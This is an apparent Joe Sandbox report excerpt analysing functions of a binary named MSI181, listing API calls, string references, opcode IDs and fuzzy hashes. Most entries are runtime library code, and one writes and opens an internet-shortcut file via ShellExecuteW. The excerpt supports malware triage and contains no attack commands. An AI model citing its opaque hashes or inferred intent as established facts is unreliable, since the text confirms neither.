Function 005BE0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B57CC: GetLastError.KERNEL32(?,00000008,005BAD4C,?,?,?,?,00000000,?,?), ref: 005B57D0
Part of subcall function 005B57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 005B5872

EnumSystemLocalesW.KERNEL32(005BE01F,00000001,?,?,?,005BE88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 005BE0FD

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: de663a1a5b884d7c32f5ec48db3647eb14fc18d6c58430642fd348e97802bcb7
Instruction ID: 59270e6d64cbcef5005e2da6b6abfb71d9134975078aea2b2777020aaeddbbdd
Opcode Fuzzy Hash: de663a1a5b884d7c32f5ec48db3647eb14fc18d6c58430642fd348e97802bcb7
Instruction Fuzzy Hash: B5F0E53A3002099BCB04AF39DC4AAEA7F95FFC1760B1A4058EA058B651C675A882DB90

Uniqueness

Uniqueness Score: -1.00%

Function 005A23F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,005A00E2,00000000,00000000,00000004,0059ED14,00000000,00000004,0059F127,00000000,00000000), ref: 005A2410

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: fbd3fac3cbacef4cf04f413b3ea529a58b7fa5021a2773f3fe486de75a1980ab
Instruction ID: 27279ca82f9c4bef25495df83dd6659f8ba1c3b79e8492c60a2ad9369496f111
Opcode Fuzzy Hash: fbd3fac3cbacef4cf04f413b3ea529a58b7fa5021a2773f3fe486de75a1980ab
Instruction Fuzzy Hash: 3FE0D832654105BAEF154B7C9E1FFBE7E99F706709F504151F902D40D1DAB1CA00E561

Uniqueness

Uniqueness Score: -1.00%

Function 005A353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,005A3077), ref: 005A3544

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9f366b41662b0efe552c0fa1433425ea67a47136dfab179c40c261d9df99ef37
Instruction ID: 935f6d1d90cb0585267d38a083f96f35225291112fb29a2c48d2b46a4fc97b63
Opcode Fuzzy Hash: 9f366b41662b0efe552c0fa1433425ea67a47136dfab179c40c261d9df99ef37
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 005B0A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction ID: 79896dad58651479135ffa4739c736f6e0d641e252e5eda124755226c013b5a6
Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction Fuzzy Hash: 66329A34A0061ADFCF28CFA8C995AFEBBB5FF45304F244568D941A7355D632AE46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 005B92A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7e20b2345345aa5b0209184ae235507d7ab3530cb73a7cab72a2ff6d9f37b3
Instruction ID: 1b9fe8657232200c383f0d150ad0be8975d92e3077f4e1ce9c4de5c926807389
Opcode Fuzzy Hash: ac7e20b2345345aa5b0209184ae235507d7ab3530cb73a7cab72a2ff6d9f37b3
Instruction Fuzzy Hash: 01322621D29F454DD7235634CC62339AA4DBFB73C4F25D72BF81AB5AAAEB28D4835100

Uniqueness

Uniqueness Score: -1.00%

Function 005AA915 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89816e31ebb2dc529073b51ba51420302820dd829f2939bcd7d79c69d051f29
Instruction ID: 287a89f90a124df7ff90baae947d6a6fa406fbd0eccd1d0acc37987c7879904e
Opcode Fuzzy Hash: c89816e31ebb2dc529073b51ba51420302820dd829f2939bcd7d79c69d051f29
Instruction Fuzzy Hash: 4BE1B07060070A8FDB25CF68C590ABEBBF1FF4A310F248A5DD4969B691D730AD45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005AC2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction ID: 735c7aa987d9131927884c5e958f584bf661c3b454eacbd7fc61009230437b09
Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction Fuzzy Hash: 5C517F72E00219AFDF14CF99C941AEEBFB2FF89310F198469E815AB201C7349E50CB94

Uniqueness

Uniqueness Score: -1.00%

Function 005A4920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: f742b8b8adc9f2e194fc0ef0037ecb0ce0d1996bed6e957b9e63943054093860
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 661108772011824FD604C6AEC4B45BFEF95FBC732572D436AD0928B758D2A2A9659E00

Uniqueness

Uniqueness Score: -1.00%

Function 005BAD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction ID: 91059cec6faa753bb53f1d279a23bd48b92bb887b5e8ecac0b9cb1b07564a6f7
Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction Fuzzy Hash: 4EE08C72911238EFCB14DB98C9489CAFBECFB88B01B19049AF601D3500C270EE00D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 005B2DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction ID: 2b5f98666d9d6b78fc4b424260fe0fe47411064025f184484744ebee7f55a3b0
Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction Fuzzy Hash: BFC08C34100E004ECF2AA9108AB13E83754B7D1782F80068CC4030BA4AC52EBC83D621

Uniqueness

Uniqueness Score: -1.00%

Function 00586600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 0058667E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005866D7
LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005866E2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005866FE
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,005C49E5,000000FF), ref: 005867DB
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,005C49E5,000000FF), ref: 005867E7
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005C49E5), ref: 0058682F
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,005C49E5,000000FF), ref: 0058684A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005C49E5), ref: 00586867
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,005C49E5,000000FF), ref: 00586891
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 005868D8
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 0058692A
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,005C49E5,000000FF), ref: 0058695C

Strings

URL Shortcut content:, xrefs: 00586875
[InternetShortcut]URL=, xrefs: 0058670A
-_.~!*'();:@&=+$,/?#[], xrefs: 00586757, 0058676E
open, xrefs: 005868D1, 005868F0

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
API String ID: 2199533872-3004881174
Opcode ID: fa31431528ef7262359191d8df8ec5db2a8812ecdca3d8bc9a98439d26c3e6e5
Instruction ID: 072a006223e0129875de9d58ee03bde4fc31a1bdb3bde12719f9427deb40e17a
Opcode Fuzzy Hash: fa31431528ef7262359191d8df8ec5db2a8812ecdca3d8bc9a98439d26c3e6e5
Instruction Fuzzy Hash: EEB1E471900249AFEB20EF68CC49BEEBFA5FF55710F144159E914BB2C1E7749A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005A2B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(005DDD3C,00000FA0,?,?,005A2B6A), ref: 005A2B98
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,005A2B6A), ref: 005A2BA3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,005A2B6A), ref: 005A2BB4
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005A2BC6
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005A2BD4
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,005A2B6A), ref: 005A2BF7
DeleteCriticalSection.KERNEL32(005DDD3C,00000007,?,?,005A2B6A), ref: 005A2C13
CloseHandle.KERNEL32(00000000,?,?,005A2B6A), ref: 005A2C23

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 005A2B9E
SleepConditionVariableCS, xrefs: 005A2BC0
kernel32.dll, xrefs: 005A2BAF
WakeAllConditionVariable, xrefs: 005A2BCC

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: b11b95982aa6ac54761f6d38ea3a7802cda14168273f767f6279446f9bb78dad
Instruction ID: 43637f8589788ca59995079bfecae2ef9a6e31601dc7bea23ab69a5a3dbe0166
Opcode Fuzzy Hash: b11b95982aa6ac54761f6d38ea3a7802cda14168273f767f6279446f9bb78dad
Instruction Fuzzy Hash: 8A01B970645B15AFDB212F79AC0DE6A3F69FF6AB51B140816BC05D2590DA74CC04DF70

Uniqueness

Uniqueness Score: -1.00%

Function 005A5CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 005A5DAC
type_info::operator==.LIBVCRUNTIME ref: 005A5DCE
___TypeMatch.LIBVCRUNTIME ref: 005A5EDD
IsInExceptionSpec.LIBVCRUNTIME ref: 005A5FAF
_UnwindNestedFrames.LIBCMT ref: 005A6033
CallUnexpected.LIBVCRUNTIME ref: 005A604E

Strings

csm, xrefs: 005A5E05
csm, xrefs: 005A5D59
csm, xrefs: 005A5CEC

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 3f4b9ed66a87b927150b777cd705666e2747322ce09bd0aca0d4fed294991469
Instruction ID: 64222cbc546f0298de10f0a20b8f1bbea490eb0d49f3396de08e3f9a238c8fa8
Opcode Fuzzy Hash: 3f4b9ed66a87b927150b777cd705666e2747322ce09bd0aca0d4fed294991469
Instruction Fuzzy Hash: 8EB16B7180060AEFCF15DFA4C885DAEBFB5FF56310B18805AF8156B212E731DA55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00584270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,F302A5AA,?,?,?), ref: 005842D2
OpenProcess.KERNEL32(00000400,00000000,?,?,F302A5AA,?,?,?), ref: 005842F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F302A5AA,?,?,?), ref: 00584326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F302A5AA,?,?,?), ref: 00584337
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 00584355
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 00584371
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 00584399
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 005843B5
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 005843D3
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 005843EF

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CloseHandle$Process$OpenTimes
String ID:
API String ID: 1711917922-0
Opcode ID: 69831f4c12b92d39b70bdede544289952f0c67cd1af7c97e00d72dbd03ce4502
Instruction ID: 6e463e2fd08c8dde1242e277f45c52bccd85aab6e38299eb549c73e6f30435f8
Opcode Fuzzy Hash: 69831f4c12b92d39b70bdede544289952f0c67cd1af7c97e00d72dbd03ce4502
Instruction Fuzzy Hash: E3518A70D01619AFDB20DF98C988BAEBFF4BF48714F24461AE910B7290CB745D458FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0059BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059BBC4

Part of subcall function 0059254E: __EH_prolog3.LIBCMT ref: 00592555
Part of subcall function 0059254E: std::_Lockit::_Lockit.LIBCPMT ref: 0059255F
Part of subcall function 0059254E: std::_Lockit::~_Lockit.LIBCPMT ref: 005925D0

Strings

%H : %M, xrefs: 0059BD03
%m / %d / %y, xrefs: 0059BCBB
%d / %m / %y, xrefs: 0059BEFA
%b %d %H : %M : %S %Y, xrefs: 0059BE52
%I : %M : %S %p, xrefs: 0059BF1F
:AM:am:PM:pm, xrefs: 0059BF2A
%H : %M : %S, xrefs: 0059BD5D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1538362411-2891247106
Opcode ID: b7071967f170c42d556f6146ad925466a2ee382f952d5b33e9089e4900a6674d
Instruction ID: 579a24cbc544b42aec0c9dead190c7e668ac4bd4b0c7398bfbb166dfaed0d503
Opcode Fuzzy Hash: b7071967f170c42d556f6146ad925466a2ee382f952d5b33e9089e4900a6674d
Instruction Fuzzy Hash: 85B16C7250020AAFFF19DF68EE99EFE3FA9FB44304F144519FA06A6251D7319A10DB60

Uniqueness

Uniqueness Score: -1.00%

Function 005A0C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005A0CA4

Part of subcall function 00589270: std::_Lockit::_Lockit.LIBCPMT ref: 005892A0
Part of subcall function 00589270: std::_Lockit::_Lockit.LIBCPMT ref: 005892C2
Part of subcall function 00589270: std::_Lockit::~_Lockit.LIBCPMT ref: 005892EA
Part of subcall function 00589270: std::_Lockit::~_Lockit.LIBCPMT ref: 00589422

Strings

%H : %M, xrefs: 005A0DE3
%m / %d / %y, xrefs: 005A0D9B
%d / %m / %y, xrefs: 005A0FDA
%b %d %H : %M : %S %Y, xrefs: 005A0F32
%I : %M : %S %p, xrefs: 005A0FFF
:AM:am:PM:pm, xrefs: 005A100A
%H : %M : %S, xrefs: 005A0E3D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: b84eb8e8759c88acce9e623ffee7e820bb495c164d5de26e28bfac436570fa72
Instruction ID: ff5b334053aee4e12c1fccfeb4ef6084b7ce5d6c5575a2b38fd771f826b3a236
Opcode Fuzzy Hash: b84eb8e8759c88acce9e623ffee7e820bb495c164d5de26e28bfac436570fa72
Instruction Fuzzy Hash: 4EB19E7651010AAFCF29DFA8CD59EFE3FA9FF46300F144519FA06A6291E631DA10DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0059BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059BF85

Part of subcall function 00588610: std::_Lockit::_Lockit.LIBCPMT ref: 00588657
Part of subcall function 00588610: std::_Lockit::_Lockit.LIBCPMT ref: 00588679
Part of subcall function 00588610: std::_Lockit::~_Lockit.LIBCPMT ref: 005886A1
Part of subcall function 00588610: std::_Lockit::~_Lockit.LIBCPMT ref: 0058880E

Strings

%H : %M, xrefs: 0059C0C4
%m / %d / %y, xrefs: 0059C07C
%d / %m / %y, xrefs: 0059C2BB
%b %d %H : %M : %S %Y, xrefs: 0059C213
%I : %M : %S %p, xrefs: 0059C2E0
:AM:am:PM:pm, xrefs: 0059C2EB
%H : %M : %S, xrefs: 0059C11E

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 603fff5b12c4a577f50591f52d2873b9ba3fbe7c5bcdd8f2c3bf90b71623fc0a
Instruction ID: 58abe384c3045f55b35cfb46c5a9ad6105d50e3d63bddcac918a86ba478d081a
Opcode Fuzzy Hash: 603fff5b12c4a577f50591f52d2873b9ba3fbe7c5bcdd8f2c3bf90b71623fc0a
Instruction Fuzzy Hash: 20B1AD7650010AEFCF19DFA8C95ADFE3FB9FB49340F148919FA42A2252D631DA10DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00583C20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

